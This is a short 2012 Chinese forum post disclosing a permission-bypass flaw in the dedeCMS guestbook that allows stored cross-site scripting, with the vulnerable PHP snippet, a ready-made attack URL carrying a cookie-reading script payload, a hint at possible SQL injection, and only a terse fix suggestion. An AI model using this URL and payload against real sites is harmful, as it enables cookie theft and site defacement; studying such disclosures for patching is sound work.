dedeCMS留言权限绕过导致跨站攻击及修复

楼主^#

更多发布于：2012-11-09 18:05


	dedeCMS某处由于权限绕过可导致跨站脚本攻击首先是/plus/guestbook.php 图片：20121109105648413.gif action=admin然后来到/guestbook/edit.inc.php 图片：20121109105648103.gif else if($job=='editok')//这里没有判断$g_isadmin { $remsg = trim($remsg); 略 $dsql->ExecuteNoneQuery("update `#@__guestbook` set `msg`='$msg', `posttime`='".time()."' where id='$id' ");//而这里没有过滤,可以写代码了…… ShowMsg("成功更改或回复一条留言！",$GUEST_BOOK_POS); exit(); } http://www.xxx.com/plus/guestbook.php?action=admin;job=editok;id=100;msg=<body onload=alert(document.cookie)> 这个id,可以在[回复/编辑]这个按钮处看到仔细试试没准还能试出注入呢。。。。图片：20121109105648376.jpg 图片：20121109105649923.jpg 图片：20121109105649926.jpg 修复方案：权限啊，过滤啊，自己看着办吧